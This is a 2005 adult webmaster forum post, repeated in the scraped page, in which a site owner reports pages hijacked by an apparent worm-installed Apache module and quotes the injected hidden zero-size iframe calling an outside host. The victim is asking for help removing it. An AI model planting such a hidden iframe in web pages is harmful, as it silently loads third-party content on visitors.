GoFuckYourself.com - Adult Webmaster Forum - View Single Post

yellofello · 05-07-2005, 04:34 PM

So I was informed of my pages displaying malicious code just yesterday by a few webmasters, already have been blacklisted at some places. I go through some old galleries and can't find anything weird on them. Then just now as I uploaded NEW html files, THIS BULLSHIT CODE appears on ALL of them at the very top of the page:

IFRAME SRC="http://toolbarpartner.com/in.php?wm=alextor" WIDTH=0 BORDER=0 HEIGHT=0

I've been in touch with my host regarding this (yesterday, before I found this exact HTML code) and this was their response:

The problem with the virus is a worm. Are you using any TGP Rotator software, like Comus Thumbs? There is a hole in some software, which we can not figure out, that allows a passthru to install an apache module that shows this virus on all pages. We have been trying to figure out how they get in for a while now with no luck. We are trying to track this down.

I recall this happening to someone at ThinkReel but can't seem to dig up the thread now. Any ideas on how to get this shit off my server? Re-uploading pages dont work as my host has told me its an apache module that adds the code on the fly.

05-07-2005, 04:34 PM
yellofello Confirmed User Join Date: Oct 2002 Posts: 183	hijacked pages on my server So I was informed of my pages displaying malicious code just yesterday by a few webmasters, already have been blacklisted at some places. I go through some old galleries and can't find anything weird on them. Then just now as I uploaded NEW html files, THIS BULLSHIT CODE appears on ALL of them at the very top of the page: IFRAME SRC="http://toolbarpartner.com/in.php?wm=alextor" WIDTH=0 BORDER=0 HEIGHT=0 I've been in touch with my host regarding this (yesterday, before I found this exact HTML code) and this was their response: The problem with the virus is a worm. Are you using any TGP Rotator software, like Comus Thumbs? There is a hole in some software, which we can not figure out, that allows a passthru to install an apache module that shows this virus on all pages. We have been trying to figure out how they get in for a while now with no luck. We are trying to track this down. I recall this happening to someone at ThinkReel but can't seem to dig up the thread now. Any ideas on how to get this shit off my server? Re-uploading pages dont work as my host has told me its an apache module that adds the code on the fly.